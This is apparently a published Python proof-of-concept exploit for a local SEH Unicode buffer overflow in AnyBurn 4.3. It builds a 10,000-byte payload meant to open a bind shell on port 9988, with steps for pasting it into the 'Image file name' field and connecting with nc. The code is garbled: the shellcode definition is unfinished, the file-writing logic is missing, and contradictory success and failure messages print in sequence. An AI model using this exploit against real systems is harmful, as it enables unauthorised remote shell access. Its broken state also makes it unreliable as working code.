#!/usr/bin/env python
# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002
# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now'
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'
# alphanumeric bindshell - port 9988, courtesy of b33f
shellcode = (
# total payload length 10000
align = (
"\x55"#push EBP - closer register to our shellcode, from where we are pivoting
"\x6e"#Venetian Padding
"\x58"#pop EAX
"\x6e"#Venetian Padding
"\x05\x22\x11"#add eax,0x11002200\
"\x6e"#Venetian Padding |> +0xB00
"\x2d\x17\x11"#sub eax,0x11001700/
"\x6e"#Venetian Padding
"\x50"#push EAX
"\x6e"#Venetian Padding
"\xC3") #RETN
nseh = "\x94\x94" # ANSI x94 translates to Unicode 201D
seh ="\xb5\x4d" # 0x004d00b5 POP POP RET in AnyBurn.exe module
preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))
print "[+] Creating %s bytes lasagna payload.." %len(exploit)
print "[+] File created!"
print "File cannot be created"